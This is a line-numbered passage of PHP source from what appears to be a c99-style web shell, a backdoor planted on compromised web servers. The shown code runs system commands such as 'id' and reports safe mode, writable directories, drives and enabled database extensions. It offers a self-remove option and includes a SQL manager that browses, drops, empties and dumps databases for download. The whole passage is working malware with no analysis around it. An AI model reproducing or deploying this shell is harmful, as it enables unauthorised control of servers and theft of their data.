  1780.     <td ><b><?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();} ?></b></td>
  1781.     <td width="9%"><?php echo "<a href=\"".$surl."act=systeminfo\" ><b><u>Sys</u>tem<u>info</u></b></a>"?></td>
  1782.     <td width="9%"></td>
  1783.  </tr>
  1784.  <tr>
  1785.     <td width="9%" ><b>Safe Mode :</b></td>
  1786.     <td ><b><?php echo $hsafemode; ?></b></td>
  1787.     <td width="9%"><b></b></td>
  1788.     <td width="9%"></td>
  1789.  </tr>
  1790.  <tr>
  1791.     <td width="9%" ><b>Directory :</b></td>
  1792.     <td ><b>
  1793.     <?php
  1794.  
  1795. $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
  1796.  
  1797. if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
  1798.  
  1799. $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
  1800.  
  1801. if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  1802.  
  1803. $d = str_replace("\\\\","\\",$d);
  1804.  
  1805. $dispd = htmlspecialchars($d);
  1806.  
  1807. $pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
  1808.  
  1809. $i = 0;
  1810.  
  1811. foreach($pd as $b)
  1812.  
  1813. {
  1814.  
  1815.  $t = "";
  1816.  
  1817.  $j = 0;
  1818.  
  1819.  foreach ($e as $r)
  1820.  
  1821.  {
  1822.  
  1823.   $t.= $r.DIRECTORY_SEPARATOR;
  1824.  
  1825.   if ($j == $i) {break;}
  1826.  
  1827.   $j++;
  1828.  
  1829.  }
  1830.  
  1831.  echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>";
  1832.  
  1833.  $i++;
  1834.  
  1835. }
  1836.  
  1837. echo "&nbsp;&nbsp;&nbsp;";
  1838.  
  1839. if (is_writable($d))
  1840.  
  1841. {
  1842.  
  1843.  $wd = TRUE;
  1844.  
  1845.  $wdt = "<font color=green>[ ok ]</font>";
  1846.  
  1847.  echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>";
  1848.  
  1849. }
  1850.  
  1851. else
  1852.  
  1853. {
  1854.  
  1855.  $wd = FALSE;
  1856.  
  1857.  $wdt = "<font color=red>[ Read-Only ]</font>";
  1858.  
  1859.  echo "<b>".view_perms_color($d)."</b>";
  1860.  
  1861. }
  1862.  ?>
  1863.  </b></td>
  1864.     <td width="9%"><?php echo "<a href=\"".$surl."act=selfremove\" ><b><font color='orange'>Self <u>Remove</u></font></b></a>"?></td>
  1865.     <td width="9%"></td>
  1866.  </tr>
  1867.  <tr>
  1868.     <td width="9%" ><b>Free Space :</b></td>
  1869.     <td ><b>
  1870.     <?php if (is_callable("disk_free_space"))
  1871.  
  1872. {
  1873.  
  1874.  $free = disk_free_space($d);
  1875.  
  1876.  $total = disk_total_space($d);
  1877.  
  1878.  if ($free === FALSE) {$free = 0;}
  1879.  
  1880.  if ($total === FALSE) {$total = 0;}
  1881.  
  1882.  if ($free < 0) {$free = 0;}
  1883.  
  1884.  if ($total < 0) {$total = 0;}
  1885.  
  1886.  $used = $total-$free;
  1887.  
  1888.  $free_percent = round(100/($total/$free),2);
  1889.  
  1890.  echo "<b>".view_size($free)." of ".view_size($total)." (".$free_percent."%)</b>";
  1891.  
  1892. }?>
  1893.     </b></td>
  1894.     <td width="9%"><?php echo "<a href=\"".$surl."act=feedback\" ><b>Feed<u>back</u></b></a>"?></td>
  1895.     <td width="9%"></td>
  1896.  </tr>
  1897.  <tr>
  1898.     <td width="9%" ><b>Drives :</b></td>
  1899.     <td ><b>
  1900.     <?php $letters = "";
  1901.  
  1902. if ($win)
  1903.  
  1904. {
  1905.  
  1906.  $v = explode("\\",$d);
  1907.  
  1908.  $v = $v[0];
  1909.  
  1910.  foreach (range("a","z") as $letter)
  1911.  
  1912.  {
  1913.  
  1914.   $bool = $isdiskette = in_array($letter,$safemode_diskettes);
  1915.  
  1916.   if (!$bool) {$bool = is_dir($letter.":\\");}
  1917.  
  1918.   if ($bool)
  1919.  
  1920.   {
  1921.  
  1922.    $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"").">[ ";
  1923.  
  1924.    if ($letter.":" != $v) {$letters .= $letter;}
  1925.  
  1926.    else {$letters .= "<font color=green>".$letter."</font>";}
  1927.  
  1928.    $letters .= " ]</a> ";
  1929.  
  1930.   }
  1931.  
  1932.  }
  1933.  
  1934.  if (!empty($letters)) {echo $letters."<br>";}
  1935. }
  1936.  ?></b></td>
  1937.     <td width="9%"><a href="<?php echo $self.'?logout'?>"><b><font color='green'>Let <u>me</u> Out</font></b></a></td>
  1938.     <td width="9%"></td>
  1939.  </tr>
  1940.  
  1941.  </table>
  1942. </td>
  1943.  
  1944. </tr>
  1945. </table>
  1946.  
  1947. <TABLE style="BORDER-COLLAPSE: collapse" height="1" cellSpacing=0 borderColorDark=#c0c0c0 cellPadding=5 width="100%" bgColor=#15354c borderColorLight=#c0c0c0 border=1>
  1948. <tr><td width="100%" valign="top">
  1949.             ADMIN: <?php echo $_SERVER['SERVER_ADMIN'];?> <font color="silver">|</font>
  1950.             PHP : <?php echo "<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>".$phpVersion."</u></b></a>"?> <font color="silver">|</font>
  1951.             Curl : <?php echo function_exists('curl_version')?("<font color='red'>Enabled</font>"):("Disabled"); ?>  <font color="silver">|</font>
  1952.             Oracle : <?php echo function_exists('ocilogon')?("<font color='red'>Enabled</font>"):("Disabled"); ?> <font color="silver">|</font>
  1953.             MySQL : <?php  echo function_exists('mysql_connect')?("<font color='red'>Enabled</font>"):("Disabled");?> <font color="silver">|</font>
  1954.             MSSQL : <?php echo function_exists('mssql_connect')?("<font color='red'>Enabled</font>"):("Disabled"); ?> <font color="silver">|</font>
  1955.             PostgreSQL : <?php echo function_exists('pg_connect')?("<font color='red'>Enabled</font>"):("Disabled"); ?> <font color="silver">|</font>
  1956.             Disable functions : <?php getDisabledFunctions(); ?>   
  1957.             </td></tr>
  1958. </table>
  1959.  
  1960. <TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#c0c0c0 cellPadding=5 width="100%" bgColor=#15354c borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0">
  1961. <tr><td width="100%" valign="top">
  1962.    <?php
  1963.     if (count($quicklaunch) > 0)
  1964.  
  1965.     {
  1966.  
  1967.      foreach($quicklaunch as $item)
  1968.  
  1969.      {
  1970.  
  1971.       $item[1] = str_replace("%d",urlencode($d),$item[1]);
  1972.  
  1973.       $item[1] = str_replace("%sort",$sort,$item[1]);
  1974.  
  1975.       $v = realpath($d."..");
  1976.  
  1977.       if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);}
  1978.  
  1979.       $item[1] = str_replace("%upd",urlencode($v),$item[1]);
  1980.  
  1981.       echo "<a href=\"".$item[1]."\">".$item[0]."</a>&nbsp;&nbsp;&nbsp;&nbsp;";
  1982.  
  1983.      }
  1984.  
  1985.     }?>
  1986.    </td>
  1987.   </tr>
  1988.  </table><br>
  1989. <?php
  1990.  
  1991. if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#15354c borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";}
  1992.  
  1993. echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#15354c borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">";
  1994.  
  1995. if ($act == "") {$act = $dspact = "ls";}
  1996.  
  1997. if ($act == "sql")
  1998.  
  1999. {
  2000.  
  2001.  $sql_surl = $surl."act=sql";
  2002.  
  2003.  if ($sql_login)  {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
  2004.  
  2005.  if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
  2006.  
  2007.  if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
  2008.  
  2009.  if ($sql_port)   {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
  2010.  
  2011.  if ($sql_db)     {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
  2012.  
  2013.  $sql_surl .= "&";
  2014.  
  2015.  ?><h3>Attention! SQL-Manager is <u>NOT</u> ready module! Don't reports bugs.</h3>
  2016.  <TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#15354c borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php
  2017.  
  2018.  if ($sql_server)
  2019.  
  2020.  {
  2021.  
  2022.   $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
  2023.  
  2024.   $err = mysql_smarterror();
  2025.  
  2026.   @mysql_select_db($sql_db,$sql_sock);
  2027.  
  2028.   if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();}
  2029.  
  2030.  }
  2031.  
  2032.  else {$sql_sock = FALSE;}
  2033.  
  2034.  echo "<b>SQL Manager:</b><br>";
  2035.  
  2036.  if (!$sql_sock)
  2037.  
  2038.  {
  2039.  
  2040.   if (!$sql_server) {echo "NO CONNECTION";}
  2041.  
  2042.   else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";}
  2043.  
  2044.  }
  2045.  
  2046.  else
  2047.  
  2048.  {
  2049.  
  2050.   $sqlquicklaunch = array();
  2051.  
  2052.   $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
  2053.  
  2054.   $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl));
  2055.  
  2056.   $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
  2057.  
  2058.   $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
  2059.  
  2060.   $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
  2061.  
  2062.   $sqlquicklaunch[] = array("Logout",$surl."act=sql");
  2063.  
  2064.   echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>";
  2065.  
  2066.   if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><b>".$item[0]."</b></a> ] ";}}
  2067.  
  2068.   echo "</center>";
  2069.  
  2070.  }
  2071.  
  2072.  echo "</td></tr><tr>";
  2073.  
  2074.  if (!$sql_sock) {?>
  2075.  <td width="28%" height="100" valign="top"><center><font size="5"> i </font></center>
  2076.   <li>If login is null, login is owner of process.<li>
  2077.   If host is null, host is local-host</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<b>Please, fill the form:</b><table><tr><td><b>User_name</b></td><td><b>Password</b>&nbsp;</td><td><b>Database</b>&nbsp;</td></tr><form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td><input type="password" name="sql_passwd" value="" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"></td><td><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table>
  2078.   </td>
  2079.   <?php }
  2080.  
  2081.  else
  2082. {
  2083.  
  2084.   //Start left panel
  2085.  
  2086.   if (!empty($sql_db))
  2087.   {
  2088.  
  2089.    ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php
  2090.  
  2091.    $result = mysql_list_tables($sql_db);
  2092.  
  2093.    if (!$result) {echo mysql_smarterror();}
  2094.  
  2095.    else
  2096.  
  2097.    {
  2098.  
  2099.     echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
  2100.  
  2101.     $c = 0;
  2102.  
  2103.     while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>»&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;}
  2104.  
  2105.     if (!$c) {echo "No tables found in database.";}
  2106.  
  2107.    }
  2108.  
  2109.   }
  2110.  
  2111.   else
  2112.  
  2113.   {
  2114.  
  2115.    ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php
  2116.  
  2117.    $result = mysql_list_dbs($sql_sock);
  2118.  
  2119.    if (!$result) {echo mysql_smarterror();}
  2120.  
  2121.    else
  2122.  
  2123.    {
  2124.  
  2125.     ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php
  2126.  
  2127.     $c = 0;
  2128.  
  2129.     $dbs = "";
  2130.  
  2131.     while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;}
  2132.  
  2133.     echo "<option value=\"\">Databases (".$c.")</option>";
  2134.  
  2135.     echo $dbs;
  2136.  
  2137.    }
  2138.  
  2139.    ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php
  2140.  
  2141.   }
  2142.  
  2143.   //End left panel
  2144.  
  2145.   echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">";
  2146.  
  2147.   //Start center panel
  2148.  
  2149.   $diplay = TRUE;
  2150.  
  2151.   if ($sql_db)
  2152.  
  2153.   {
  2154.  
  2155.    if (!is_numeric($c)) {$c = 0;}
  2156.  
  2157.    if ($c == 0) {$c = "no";}
  2158.  
  2159.    echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>";
  2160.  
  2161.    if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}}
  2162.  
  2163.    echo "</b></center>";
  2164.  
  2165.    $acts = array("","dump");
  2166.  
  2167.    if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
  2168.  
  2169.    elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";}
  2170.  
  2171.    elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";}
  2172.  
  2173.    elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
  2174.  
  2175.    elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
  2176.  
  2177.    elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
  2178.  
  2179.    elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
  2180.  
  2181.    elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";}
  2182.  
  2183.    elseif ($sql_tbl_act == "insert")
  2184.  
  2185.    {
  2186.  
  2187.     if ($sql_tbl_insert_radio == 1)
  2188.  
  2189.     {
  2190.  
  2191.      $keys = "";
  2192.  
  2193.      $akeys = array_keys($sql_tbl_insert);
  2194.  
  2195.      foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}
  2196.  
  2197.      if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
  2198.  
  2199.      $values = "";
  2200.  
  2201.      $i = 0;
  2202.  
  2203.      foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;}
  2204.  
  2205.      if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
  2206.  
  2207.      $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
  2208.  
  2209.      $sql_act = "query";
  2210.  
  2211.      $sql_tbl_act = "browse";
  2212.  
  2213.     }
  2214.  
  2215.     elseif ($sql_tbl_insert_radio == 2)
  2216.  
  2217.     {
  2218.  
  2219.      $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
  2220.  
  2221.      $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
  2222.  
  2223.      $result = mysql_query($sql_query) or print(mysql_smarterror());
  2224.  
  2225.      $result = mysql_fetch_array($result, MYSQL_ASSOC);
  2226.  
  2227.      $sql_act = "query";
  2228.  
  2229.      $sql_tbl_act = "browse";
  2230.  
  2231.     }
  2232.  
  2233.    }
  2234.  
  2235.    if ($sql_act == "query")
  2236.  
  2237.    {
  2238.  
  2239.     echo "<hr size=\"1\" noshade>";
  2240.  
  2241.     if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
  2242.  
  2243.     if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
  2244.  
  2245.     if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form></td></tr></table>";}
  2246.  
  2247.    }
  2248.  
  2249.    if (in_array($sql_act,$acts))
  2250.  
  2251.    {
  2252.  
  2253.     ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>Dump DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
  2254.  
  2255.     if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}
  2256.  
  2257.     if ($sql_act == "newtbl")
  2258.  
  2259.     {
  2260.  
  2261.      echo "<b>";
  2262.  
  2263.      if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
  2264.  
  2265.     }
  2266.  
  2267.     else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
  2268.  
  2269.    }
  2270.  
  2271.    elseif ($sql_act == "dump")
  2272.  
  2273.    {
  2274.  
  2275.     if (empty($submit))
  2276.  
  2277.     {
  2278.  
  2279.      $diplay = FALSE;
  2280.  
  2281.      echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>";
  2282.  
  2283.      echo "<b>DB:</b>&nbsp;<input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>";
  2284.  
  2285.      $v = join (";",$dmptbls);
  2286.  
  2287.      echo "<b>Only tables (explode \";\")&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>";
  2288.  
  2289.      if ($dump_file) {$tmp = $dump_file;}
  2290.  
  2291.      else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");}
  2292.  
  2293.      echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>";
  2294.  
  2295.      echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>";
  2296.  
  2297.      echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>";
  2298.  
  2299.      echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty";
  2300.  
  2301.      echo "</form>";
  2302.  
  2303.     }
  2304.  
  2305.     else
  2306.  
  2307.     {
  2308.  
  2309.      $diplay = TRUE;
  2310.  
  2311.      $set = array();
  2312.  
  2313.      $set["sock"] = $sql_sock;
  2314.  
  2315.      $set["db"] = $sql_db;
  2316.  
  2317.      $dump_out = "download";
  2318.  
  2319.      $set["print"] = 0;
  2320.  
  2321.      $set["nl2br"] = 0;
  2322.  
  2323.      $set[""] = 0;
  2324.  
  2325.      $set["file"] = $dump_file;
  2326.  
  2327.      $set["add_drop"] = TRUE;
  2328.  
  2329.      $set["onlytabs"] = array();
  2330.  
  2331.      if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);}
  2332.  
  2333.      $ret = mysql_dump($set);
  2334.  
  2335.      if ($sql_dump_download)
  2336.  
  2337.      {
  2338.  
  2339.       @ob_clean();
  2340.  
  2341.       header("Content-type: application/octet-stream");
  2342.  
  2343.       header("Content-length: ".strlen($ret));
  2344.  
  2345.       header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";");
  2346.  
  2347.       echo $ret;
  2348.  
  2349.       exit;
  2350.  
  2351.      }
  2352.  
  2353.      elseif ($sql_dump_savetofile)
  2354.  
  2355.      {
  2356.  
  2357.       $fp = fopen($sql_dump_file,"w");
  2358.  
  2359.       if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";}
  2360.  
  2361.       else
  2362.  
  2363.       {
  2364.  
  2365.        fwrite($fp,$ret);
  2366.  
  2367.        fclose($fp);
  2368.  
  2369.        echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>.";
  2370.  
  2371.       }
  2372.  
  2373.      }
  2374.  
  2375.      else {echo "<b>Dump: nothing to do!</b>";}
  2376.  
  2377.     }
  2378.  
  2379.    }
  2380.  
  2381.    if ($diplay)
  2382.  
  2383.    {
  2384.  
  2385.     if (!empty($sql_tbl))
  2386.  
  2387.     {
  2388.  
  2389.      if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";}
  2390.  
  2391.      $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");
  2392.  
  2393.      $count_row = mysql_fetch_array($count);
  2394.  
  2395.      mysql_free_result($count);
  2396.  
  2397.      $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");
  2398.  
  2399.      $tbl_struct_fields = array();
  2400.  
  2401.      while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}
  2402.  
  2403.      if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;}
  2404.  
  2405.      if (empty($sql_tbl_page)) {$sql_tbl_page = 0;}
  2406.  
  2407.      if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;}
  2408.  
  2409.      if (empty($sql_tbl_le)) {$sql_tbl_le = 30;}
  2410.  
  2411.      $perpage = $sql_tbl_le - $sql_tbl_ls;
  2412.  
  2413.      if (!is_numeric($perpage)) {$perpage = 10;}
  2414.  
  2415.      $numpages = $count_row[0]/$perpage;
  2416.  
  2417.      $e = explode(" ",$sql_order);
  2418.  
  2419.      if (count($e) == 2)
  2420.  
  2421.      {
  2422.  
  2423.       if ($e[0] == "d") {$asc_desc = "DESC";}
  2424.  
  2425.       else {$asc_desc = "ASC";}
  2426.  
  2427.       $v = "ORDER BY `".$e[1]."` ".$asc_desc." ";
  2428.  
  2429.      }
  2430.  
  2431.      else {$v = "";}
  2432.  
  2433.      $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
  2434.  
  2435.      $result = mysql_query($query) or print(mysql_smarterror());
  2436.  
  2437.      echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>";
  2438.  
